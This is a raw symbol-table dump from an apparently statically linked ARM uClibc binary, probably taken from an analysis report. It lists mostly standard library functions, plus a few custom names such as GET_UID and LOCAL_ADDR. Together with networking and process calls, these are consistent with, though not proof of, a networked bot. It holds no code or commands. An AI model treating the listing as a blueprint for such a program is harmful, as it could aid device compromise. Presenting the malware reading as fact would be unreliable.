                                      $d.symtab0x2d1b40NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x2d1b80NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x2d1bc0NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x237180NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x237440NOTYPE<unknown>DEFAULT4
                                      $d.symtab0xf7240NOTYPE<unknown>DEFAULT2
                                      $d.symtab0xf78c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0xf8680NOTYPE<unknown>DEFAULT2
                                      $d.symtab0xfdc80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0xfe640NOTYPE<unknown>DEFAULT2
                                      $d.symtab0xff040NOTYPE<unknown>DEFAULT2
                                      $d.symtab0xff940NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d1c00NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x102b00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x105140NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x105e80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x110580NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x111980NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x111f80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x112180NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x112680NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x112c80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x115d40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x117d40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x11a7c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x11ad80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x11c100NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x11cb00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x11ddc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x122980NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x124a00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x12edc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x130bc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x132d00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d1c40NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x238a80NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x2d1c80NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x134740NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x13a2c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x13c680NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x142cc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1440c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x146180NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x147480NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x148940NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x14af40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x14dd40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d1dc0NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x152680NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x156000NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x00NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x200NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x260NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x2c0NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x4c0NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x530NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x15ba40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1654c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x580NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x00NOTYPE<unknown>DEFAULT24
                                      $d.symtab0x23c0NOTYPE<unknown>DEFAULT22
                                      $d.symtab0xe390NOTYPE<unknown>DEFAULT24
                                      $d.symtab0x16e780NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x16efc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x16fb80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x170a40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x170f00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x171540NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1717c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x171cc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1720c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x172440NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x172bc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x172fc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1733c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1737c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x173d80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x174200NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x174600NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x174a00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x174e00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x175180NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x175500NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x175880NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x175cc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1764c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x176900NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1771c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x177800NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x177f00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x17a600NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x17b440NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x17c040NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x17cb80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x23a440NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x17d940NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x17dd80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x180fc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x181840NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x182bc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x186f00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x187940NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x188ec0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d1e80NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x2d1e40NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x190e00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x23ab40NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x193940NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x193e00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1992c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d2cc0NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x23abc0NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x19d0c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a0bc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a2640NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a4bc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a6d40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x23b400NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x1a70c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a7b00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a8180NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a88c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a8d00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a9140NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a9880NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1a9cc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1aa140NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1aa580NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1aa980NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ab080NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ab540NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1abd80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ac1c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ac8c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1acd80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ad600NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ada80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1adec0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1b7800NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d2d00NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x1b8c80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1bc840NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c1280NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c17c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c2980NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d2e80NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x1c34c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c4040NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c4c40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c5680NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d3000NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x2d3980NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x1c6100NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c6e00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c7d40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1c8c40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x246ac0NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x1cad40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1cb880NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d3ac0NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x1ccd00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1d2ec0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1d7200NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1d7800NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1d7e80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1d9680NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1daa40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1dae40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1daf00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1db800NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1dc100NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1dca00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1de8c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1def40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1df640NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e1a00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e2000NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e3100NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e3c00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e4180NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e5380NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e5cc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e6c80NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e7a40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e7ec0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d3c40NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x1e8fc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e95c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1e9b00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ed5c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d3c80NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x1edd00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1ee540NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1eef40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f0440NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f0940NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f0d40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f13c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f2300NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f5e00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f7180NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1f8240NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x1fa400NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x204140NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x24ab00NOTYPE<unknown>DEFAULT4
                                      $d.symtab0x207e00NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x20d680NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x20e480NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x20f380NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x210240NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x212b40NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x213480NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x214940NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2167c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2179c0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x218700NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x219580NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x219cc0NOTYPE<unknown>DEFAULT2
                                      $d.symtab0x2d1d80NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x2b80NOTYPE<unknown>DEFAULT22
                                      $d.symtab0x118f0NOTYPE<unknown>DEFAULT24
                                      $d.symtab0x00TLS<unknown>DEFAULT8
                                      $d.symtab0x2d3d40NOTYPE<unknown>DEFAULT14
                                      $d.symtab0x247940NOTYPE<unknown>DEFAULT4
                                      C.0.4262.symtab0x234e028OBJECT<unknown>DEFAULT4
                                      C.11.5548.symtab0x2471812OBJECT<unknown>DEFAULT4
                                      C.5.5083.symtab0x23a4424OBJECT<unknown>DEFAULT4
                                      C.7.5370.symtab0x2472412OBJECT<unknown>DEFAULT4
                                      C.7.6078.symtab0x23a5c12OBJECT<unknown>DEFAULT4
                                      C.7.6109.symtab0x23a8c12OBJECT<unknown>DEFAULT4
                                      C.7.6182.symtab0x23a6812OBJECT<unknown>DEFAULT4
                                      C.8.6110.symtab0x23a8012OBJECT<unknown>DEFAULT4
                                      C.9.5793.symtab0x2374464OBJECT<unknown>DEFAULT4
                                      C.9.6119.symtab0x23a7412OBJECT<unknown>DEFAULT4
                                      GET_UID.symtab0x321bc1OBJECT<unknown>DEFAULT15
                                      LOCAL_ADDR.symtab0x321b84OBJECT<unknown>DEFAULT15
                                      Laligned.symtab0x1a3780NOTYPE<unknown>DEFAULT2
                                      Llastword.symtab0x1a3940NOTYPE<unknown>DEFAULT2
                                      _Exit.symtab0x170f4104FUNC<unknown>DEFAULT2
                                      _GLOBAL_OFFSET_TABLE_.symtab0x2d0140OBJECT<unknown>HIDDEN13
                                      _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                      _Unwind_Complete.symtab0x159584FUNC<unknown>HIDDEN2
                                      _Unwind_DeleteException.symtab0x1595c44FUNC<unknown>HIDDEN2
                                      _Unwind_ForcedUnwind.symtab0x1660c36FUNC<unknown>HIDDEN2
                                      _Unwind_GetCFA.symtab0x159508FUNC<unknown>HIDDEN2
                                      _Unwind_GetDataRelBase.symtab0x1599412FUNC<unknown>HIDDEN2
                                      _Unwind_GetLanguageSpecificData.symtab0x1663068FUNC<unknown>HIDDEN2
                                      _Unwind_GetRegionStart.symtab0x16dd052FUNC<unknown>HIDDEN2
                                      _Unwind_GetTextRelBase.symtab0x1598812FUNC<unknown>HIDDEN2
                                      _Unwind_RaiseException.symtab0x165a036FUNC<unknown>HIDDEN2
                                      _Unwind_Resume.symtab0x165c436FUNC<unknown>HIDDEN2
                                      _Unwind_Resume_or_Rethrow.symtab0x165e836FUNC<unknown>HIDDEN2
                                      _Unwind_VRS_Get.symtab0x158b876FUNC<unknown>HIDDEN2
                                      _Unwind_VRS_Pop.symtab0x15ed0324FUNC<unknown>HIDDEN2
                                      _Unwind_VRS_Set.symtab0x1590476FUNC<unknown>HIDDEN2
                                      _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                      __C_ctype_b.symtab0x2d3d44OBJECT<unknown>DEFAULT14
                                      __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                      __C_ctype_b_data.symtab0x24794768OBJECT<unknown>DEFAULT4
                                      __EH_FRAME_BEGIN__.symtab0x2d0000OBJECT<unknown>DEFAULT7
                                      __FRAME_END__.symtab0x2d0000OBJECT<unknown>DEFAULT7
                                      __GI___C_ctype_b.symtab0x2d3d44OBJECT<unknown>HIDDEN14
                                      __GI___close.symtab0x1db10100FUNC<unknown>HIDDEN2
                                      __GI___close_nocancel.symtab0x1daf424FUNC<unknown>HIDDEN2
                                      __GI___ctype_b.symtab0x2d3d84OBJECT<unknown>HIDDEN14
                                      __GI___errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __GI___fcntl_nocancel.symtab0x16f28152FUNC<unknown>HIDDEN2
                                      __GI___fgetc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                      __GI___glibc_strerror_r.symtab0x1a5c024FUNC<unknown>HIDDEN2
                                      __GI___libc_close.symtab0x1db10100FUNC<unknown>HIDDEN2
                                      __GI___libc_fcntl.symtab0x16fc0244FUNC<unknown>HIDDEN2
                                      __GI___libc_open.symtab0x1dba0100FUNC<unknown>HIDDEN2
                                      __GI___libc_read.symtab0x1dcc0100FUNC<unknown>HIDDEN2
                                      __GI___libc_write.symtab0x1dc30100FUNC<unknown>HIDDEN2
                                      __GI___longjmp.symtab0x1edd420FUNC<unknown>HIDDEN2
                                      __GI___nptl_create_event.symtab0x151084FUNC<unknown>HIDDEN2
                                      __GI___nptl_death_event.symtab0x1510c4FUNC<unknown>HIDDEN2
                                      __GI___open.symtab0x1dba0100FUNC<unknown>HIDDEN2
                                      __GI___open_nocancel.symtab0x1db8424FUNC<unknown>HIDDEN2
                                      __GI___pthread_cleanup_upto.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                      __GI___pthread_keys.symtab0x2d5088192OBJECT<unknown>HIDDEN15
                                      __GI___pthread_unwind.symtab0x1428484FUNC<unknown>HIDDEN2
                                      __GI___pthread_unwind_next.symtab0x142d816FUNC<unknown>HIDDEN2
                                      __GI___read.symtab0x1dcc0100FUNC<unknown>HIDDEN2
                                      __GI___read_nocancel.symtab0x1dca424FUNC<unknown>HIDDEN2
                                      __GI___register_atfork.symtab0x1d7f0392FUNC<unknown>HIDDEN2
                                      __GI___stack_user.symtab0x2d4e88OBJECT<unknown>HIDDEN15
                                      __GI___uClibc_fini.symtab0x1e894124FUNC<unknown>HIDDEN2
                                      __GI___uClibc_init.symtab0x1e96488FUNC<unknown>HIDDEN2
                                      __GI___write.symtab0x1dc30100FUNC<unknown>HIDDEN2
                                      __GI___write_nocancel.symtab0x1dc1424FUNC<unknown>HIDDEN2
                                      __GI___xpg_strerror_r.symtab0x1a5d8268FUNC<unknown>HIDDEN2
                                      __GI__exit.symtab0x170f4104FUNC<unknown>HIDDEN2
                                      __GI_abort.symtab0x1c184296FUNC<unknown>HIDDEN2
                                      __GI_accept.symtab0x1a820116FUNC<unknown>HIDDEN2
                                      __GI_atoi.symtab0x1c8d032FUNC<unknown>HIDDEN2
                                      __GI_bind.symtab0x1a89468FUNC<unknown>HIDDEN2
                                      __GI_brk.symtab0x212fc88FUNC<unknown>HIDDEN2
                                      __GI_close.symtab0x1db10100FUNC<unknown>HIDDEN2
                                      __GI_closedir.symtab0x1796c272FUNC<unknown>HIDDEN2
                                      __GI_config_close.symtab0x1f56c52FUNC<unknown>HIDDEN2
                                      __GI_config_open.symtab0x1f5a072FUNC<unknown>HIDDEN2
                                      __GI_config_read.symtab0x1f244808FUNC<unknown>HIDDEN2
                                      __GI_connect.symtab0x1a91c116FUNC<unknown>HIDDEN2
                                      __GI_exit.symtab0x1cae4196FUNC<unknown>HIDDEN2
                                      __GI_fclose.symtab0x17ddc816FUNC<unknown>HIDDEN2
                                      __GI_fcntl.symtab0x16fc0244FUNC<unknown>HIDDEN2
                                      __GI_fflush_unlocked.symtab0x19d28940FUNC<unknown>HIDDEN2
                                      __GI_fgetc.symtab0x20578324FUNC<unknown>HIDDEN2
                                      __GI_fgetc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                      __GI_fgets.symtab0x1995c284FUNC<unknown>HIDDEN2
                                      __GI_fgets_unlocked.symtab0x1a0d4160FUNC<unknown>HIDDEN2
                                      __GI_fopen.symtab0x1810c32FUNC<unknown>HIDDEN2
                                      __GI_fork.symtab0x1d37c972FUNC<unknown>HIDDEN2
                                      __GI_fprintf.symtab0x1f71c48FUNC<unknown>HIDDEN2
                                      __GI_fputs_unlocked.symtab0x1a17456FUNC<unknown>HIDDEN2
                                      __GI_fseek.symtab0x2149c36FUNC<unknown>HIDDEN2
                                      __GI_fseeko64.symtab0x214c0448FUNC<unknown>HIDDEN2
                                      __GI_fstat.symtab0x1edf4100FUNC<unknown>HIDDEN2
                                      __GI_fwrite_unlocked.symtab0x1a1ac188FUNC<unknown>HIDDEN2
                                      __GI_getc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                      __GI_getdtablesize.symtab0x1eef844FUNC<unknown>HIDDEN2
                                      __GI_getegid.symtab0x1ef2420FUNC<unknown>HIDDEN2
                                      __GI_geteuid.symtab0x1ef3820FUNC<unknown>HIDDEN2
                                      __GI_getgid.symtab0x1ef4c20FUNC<unknown>HIDDEN2
                                      __GI_getpagesize.symtab0x1715c40FUNC<unknown>HIDDEN2
                                      __GI_getpid.symtab0x1d97872FUNC<unknown>HIDDEN2
                                      __GI_getrlimit.symtab0x1719856FUNC<unknown>HIDDEN2
                                      __GI_getsockname.symtab0x1a99068FUNC<unknown>HIDDEN2
                                      __GI_gettimeofday.symtab0x171d064FUNC<unknown>HIDDEN2
                                      __GI_getuid.symtab0x1ef6020FUNC<unknown>HIDDEN2
                                      __GI_inet_addr.symtab0x1a7b440FUNC<unknown>HIDDEN2
                                      __GI_inet_aton.symtab0x211c4248FUNC<unknown>HIDDEN2
                                      __GI_initstate_r.symtab0x1c6ec248FUNC<unknown>HIDDEN2
                                      __GI_ioctl.symtab0x1ef74224FUNC<unknown>HIDDEN2
                                      __GI_isatty.symtab0x1a71436FUNC<unknown>HIDDEN2
                                      __GI_kill.symtab0x1721056FUNC<unknown>HIDDEN2
                                      __GI_listen.symtab0x1aa1c64FUNC<unknown>HIDDEN2
                                      __GI_lseek64.symtab0x21960112FUNC<unknown>HIDDEN2
                                      __GI_memchr.symtab0x20c80240FUNC<unknown>HIDDEN2
                                      __GI_memcpy.symtab0x1a2704FUNC<unknown>HIDDEN2
                                      __GI_memmove.symtab0x1a2804FUNC<unknown>HIDDEN2
                                      __GI_mempcpy.symtab0x1a3b036FUNC<unknown>HIDDEN2
                                      __GI_memrchr.symtab0x20d70224FUNC<unknown>HIDDEN2
                                      __GI_memset.symtab0x1a290156FUNC<unknown>HIDDEN2
                                      __GI_mmap.symtab0x16e04124FUNC<unknown>HIDDEN2
                                      __GI_mremap.symtab0x1f05468FUNC<unknown>HIDDEN2
                                      __GI_munmap.symtab0x1730064FUNC<unknown>HIDDEN2
                                      __GI_nanosleep.symtab0x1738096FUNC<unknown>HIDDEN2
                                      __GI_open.symtab0x1dba0100FUNC<unknown>HIDDEN2
                                      __GI_opendir.symtab0x17b4c196FUNC<unknown>HIDDEN2
                                      __GI_raise.symtab0x1d9c0240FUNC<unknown>HIDDEN2
                                      __GI_random.symtab0x1c2c4164FUNC<unknown>HIDDEN2
                                      __GI_random_r.symtab0x1c584144FUNC<unknown>HIDDEN2
                                      __GI_rawmemchr.symtab0x218b0176FUNC<unknown>HIDDEN2
                                      __GI_read.symtab0x1dcc0100FUNC<unknown>HIDDEN2
                                      __GI_readdir.symtab0x17cc0232FUNC<unknown>HIDDEN2
                                      __GI_readdir64.symtab0x1f158236FUNC<unknown>HIDDEN2
                                      __GI_readlink.symtab0x1742464FUNC<unknown>HIDDEN2
                                      __GI_recv.symtab0x1aaa0112FUNC<unknown>HIDDEN2
                                      __GI_recvfrom.symtab0x1ab58136FUNC<unknown>HIDDEN2
                                      __GI_remove.symtab0x1812c100FUNC<unknown>HIDDEN2
                                      __GI_rmdir.symtab0x1f09864FUNC<unknown>HIDDEN2
                                      __GI_sbrk.symtab0x1f0d8108FUNC<unknown>HIDDEN2
                                      __GI_select.symtab0x175d0132FUNC<unknown>HIDDEN2
                                      __GI_send.symtab0x1ac24112FUNC<unknown>HIDDEN2
                                      __GI_sendto.symtab0x1ace0136FUNC<unknown>HIDDEN2
                                      __GI_setsid.symtab0x1765464FUNC<unknown>HIDDEN2
                                      __GI_setsockopt.symtab0x1ad6872FUNC<unknown>HIDDEN2
                                      __GI_setstate_r.symtab0x1c7e4236FUNC<unknown>HIDDEN2
                                      __GI_sigaction.symtab0x16e80136FUNC<unknown>HIDDEN2
                                      __GI_sigprocmask.symtab0x17694140FUNC<unknown>HIDDEN2
                                      __GI_snprintf.symtab0x1819048FUNC<unknown>HIDDEN2
                                      __GI_socket.symtab0x1adb068FUNC<unknown>HIDDEN2
                                      __GI_sprintf.symtab0x181c052FUNC<unknown>HIDDEN2
                                      __GI_srandom_r.symtab0x1c614216FUNC<unknown>HIDDEN2
                                      __GI_stat.symtab0x17720100FUNC<unknown>HIDDEN2
                                      __GI_strchr.symtab0x20e50240FUNC<unknown>HIDDEN2
                                      __GI_strchrnul.symtab0x20f40236FUNC<unknown>HIDDEN2
                                      __GI_strcmp.symtab0x1a33028FUNC<unknown>HIDDEN2
                                      __GI_strcoll.symtab0x1a33028FUNC<unknown>HIDDEN2
                                      __GI_strcpy.symtab0x1a3d436FUNC<unknown>HIDDEN2
                                      __GI_strcspn.symtab0x2102c68FUNC<unknown>HIDDEN2
                                      __GI_strlen.symtab0x1a35096FUNC<unknown>HIDDEN2
                                      __GI_strnlen.symtab0x1a3f8204FUNC<unknown>HIDDEN2
                                      __GI_strpbrk.symtab0x2118464FUNC<unknown>HIDDEN2
                                      __GI_strrchr.symtab0x2107080FUNC<unknown>HIDDEN2
                                      __GI_strspn.symtab0x210c076FUNC<unknown>HIDDEN2
                                      __GI_strstr.symtab0x1a4c4252FUNC<unknown>HIDDEN2
                                      __GI_strtok.symtab0x1a6e448FUNC<unknown>HIDDEN2
                                      __GI_strtok_r.symtab0x2110c120FUNC<unknown>HIDDEN2
                                      __GI_strtol.symtab0x1c8f028FUNC<unknown>HIDDEN2
                                      __GI_sysconf.symtab0x1ccf41572FUNC<unknown>HIDDEN2
                                      __GI_tcgetattr.symtab0x1a738124FUNC<unknown>HIDDEN2
                                      __GI_time.symtab0x1778448FUNC<unknown>HIDDEN2
                                      __GI_times.symtab0x1f14420FUNC<unknown>HIDDEN2
                                      __GI_unlink.symtab0x177b464FUNC<unknown>HIDDEN2
                                      __GI_vfprintf.symtab0x20434324FUNC<unknown>HIDDEN2
                                      __GI_vsnprintf.symtab0x181f4208FUNC<unknown>HIDDEN2
                                      __GI_wcrtomb.symtab0x1f5e884FUNC<unknown>HIDDEN2
                                      __GI_wcsnrtombs.symtab0x1f660188FUNC<unknown>HIDDEN2
                                      __GI_wcsrtombs.symtab0x1f63c36FUNC<unknown>HIDDEN2
                                      __GI_write.symtab0x1dc30100FUNC<unknown>HIDDEN2
                                      __JCR_END__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                      __JCR_LIST__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                      ___Unwind_ForcedUnwind.symtab0x1660c36FUNC<unknown>HIDDEN2
                                      ___Unwind_RaiseException.symtab0x165a036FUNC<unknown>HIDDEN2
                                      ___Unwind_Resume.symtab0x165c436FUNC<unknown>HIDDEN2
                                      ___Unwind_Resume_or_Rethrow.symtab0x165e836FUNC<unknown>HIDDEN2
                                      __adddf3.symtab0x219dc784FUNC<unknown>HIDDEN2
                                      __aeabi_cdcmpeq.symtab0x2233824FUNC<unknown>HIDDEN2
                                      __aeabi_cdcmple.symtab0x2233824FUNC<unknown>HIDDEN2
                                      __aeabi_cdrcmple.symtab0x2231c52FUNC<unknown>HIDDEN2
